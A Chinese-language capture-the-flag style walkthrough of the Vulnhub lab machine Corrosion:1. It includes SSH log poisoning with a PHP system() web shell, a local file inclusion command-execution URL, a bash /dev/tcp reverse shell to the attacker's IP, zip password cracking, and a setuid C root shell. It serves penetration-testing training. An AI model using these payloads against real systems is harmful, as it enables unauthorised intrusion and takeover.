Vulnhub靶机Corrosion:1渗透测试详解
Vulnhub靶机介绍:
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
这是一个漏洞靶机,老样子需要找到flag即可。
Difficulty: Easy
Vulnhub靶机下载:
官网下载:https://download.vulnhub.com/corrosion/Corrosion.ova
Vulnhub靶机安装:
下载好了把安装包解压 然后使用VMware打开即可。
Vulnhub靶机漏洞详解:
①:信息收集:
kali里使用arp-scan -l或者netdiscover发现主机
使用命令:
nmap -sS -sV -T4 -n -p- 192.168.0.103
渗透机:kali IP :192.168.0.104 靶机IP :192.168.0.103
发现开启了80和22端口,老样子访问80端口(Apache默认页面)进行扫描:dirb、dirsearch、whatweb、gobuster等
这里扫到一个/tasks目录进行访问 提示我们: 然后接着使用dirsearch或者gobuster扫扫到了/blog-post然后进行访问
- 更改授权日志的权限
- 更改端口
22 -> 7672 - 设置
phpMyAdmin
gobuster dir -u http://192.168.0.103/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip
whatweb 192.168.0.103
dirsearch -u http://192.168.0.103 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
②:漏洞发现:
发现没有可以利用的信息,继续进行信息收集尝试对二级目录进行扫描gobuster扫到了一个/archives进行访问
gobuster dir -u http://192.168.0.103/blog-post/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip
这里什么也没但是感觉有点像文件包含源代码也没东西 空白的ffuf 模糊探测一下 得到参数 file然后进行文件包含
ffuf -c -w /usr/share/wordlists/dirb/big.txt -u 'http://192.168.0.103/blog-post/archives/randylogs.php?FUZZ=/var/log/auth.log' -fs 0
③:文件包含渗透(ssh日志写木马):
ssh '<?php system($_REQUEST['cmd']);?>'@192.168.0.103
view-source:http://192.168.0.103/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=ifconfig #查看发现执行成功!
④:反弹Shell:
nc -lvvp 4444
echo "bash -i >& /dev/tcp/192.168.0.104/4444 0>&1" | bash #需要url编码
http://192.168.0.103/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=echo%20%22bash%20-i%20%3E%26%20/dev/tcp/192.168.0.104/4444%200%3E%261%22%20%7C%20bash #这里需要url编码
⑤:gcc编译文件提权:
得到shell 先看一下权限发现是一个低权限www-data 所以需要提权
sudo -l 看看有没有可以执行sudo的文件也没有 隐藏文件有个randylogs.php
又在/var目录下发现backups文件,可能是备份文件
要想访问靶机里面的文件需要用python开启一个临时网页服务:python3 -m http.server 8000下载user_backup.zip发现需要密码
这里使用zip2john user_backup.zip > passwd.txt 把密码文件导入passwd文件使用john进行破解 这里要使用字典
不加字典的话结束进程会报错,这里出来个 /root/.john/john.rec 类似于进程重复了删掉就好了使用 rm -rf /root/.john/john.rec命令
在使用字典爆破就可以了使用rockyou这个字典,也可以使用fcrackzip进行爆破 得到密码:!randybaby
这里我们知道了账号密码 尝试登入randy 发现登入成功!!!
基本信息收集一下 id,whoami,sudo -l
这里sudo -l 发现/tools/easysysinfo可以免密执行命令进去cat 一下在运行一下 然后刚刚上面有个c文件 which查看有没有gcc
有的话可以编译 新建一个eastsysinfo.c内容见代码块,然后gcc 编译 sudo运行编译好的文件即可。
#include "unistd.h"
#include "stdlib.h"
void main()
{
setuid(0);
setgid(0);
system("bash -i");
}
⑥:获取FLAG:
至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!
Vulnhub靶机渗透总结:
这个靶机难度中偏上 因为比较麻烦
1.信息收集arp-scan -l 获取ip地址 和端口信息 web扫描工具:nikto,dirb,dirbuster,whatweb,ffuf等 查看F12源码信息
2.文件包含漏洞,包含日志文件 ssh写入木马ssh '<?php system($_REQUEST['cmd']);?>'@靶机(新知识点!)
3.nc反弹shell(这里要使用url编码)zip2john爆破和fcrackzip(爆破压缩包工具)还有john报错解决方法(新知识点!)
4.python3 -m http.server 8000 开启临时http服务
5.gcc 编译文件提权 which查看系统有没有有用的命令用于提权
Corrosion系列靶机的第一个靶机,学习到了很多知识点又是收获满满的一天(耶耶耶!)
最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!